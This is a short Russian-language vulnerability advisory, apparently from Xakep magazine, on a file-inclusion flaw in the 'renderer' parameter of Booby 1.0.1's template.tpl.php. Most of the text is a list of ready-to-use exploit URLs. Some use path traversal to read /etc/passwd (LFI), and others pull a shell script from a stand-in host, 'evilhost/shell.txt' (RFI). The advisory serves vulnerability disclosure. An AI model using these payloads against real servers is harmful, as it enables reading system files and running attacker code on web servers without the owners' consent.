Хакер #305. Многошаговые SQL-инъекции
Программа: Booby 1.0.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «renderer» сценарием template.tpl.php. Удаленный
пользователь может выполнить произвольный PHP сценарий на целевой системе с
привилегиями Web сервера.
Эксплоит:
Proof Of Concept LFI:
http://localhost/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd
http://localhost/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd
Proof Of Concept RFI:
http://localhost/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt
http://localhost/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt